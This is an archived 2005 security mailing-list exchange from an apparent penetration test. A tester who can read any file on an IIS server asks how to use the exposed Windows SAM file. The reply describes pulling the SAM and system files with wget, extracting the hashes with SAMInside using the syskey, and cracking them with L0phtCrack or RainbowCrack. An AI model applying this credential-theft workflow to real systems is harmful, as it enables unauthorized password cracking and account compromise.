From: David Cravshaw (david.cravshaw@gmail.com)
Date: Thu Jun 30 2005 - 13:11:54 EDT
I recently ran into a similar issue. Since the browser doesn't
interpret the sam file particularly well, you'll need something else
to pull it down. wget worked just fine in my case. Also note, that
due to syskey (enabled by default on win2000+), you will need to pull
down /winnt/repair/system and use something like SAMInside that Jerome
mentioned to extract the hashes from the sam using the syskey in the
system file.
Then you have the hashes in l0pht-able, or more preferably,
rainbowcrack-able format!
On 28 Jun 2005 19:02:54 -0000, nordicsmak@yahoo.com
<nordicsmak@yahoo.com> wrote:
> During a recent penetration test I've discovered a flaw in the IIS server that allows me to browse to and view any file on the system.
>
> I'm able to browse to the /winnt/repair/sam file, but it obviously is unusable in the format that's presented in the browser.
>
> Any way to get this file in a format that can be used in L0pht?
>
> Thanks,
> Chris
>
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:30 EDT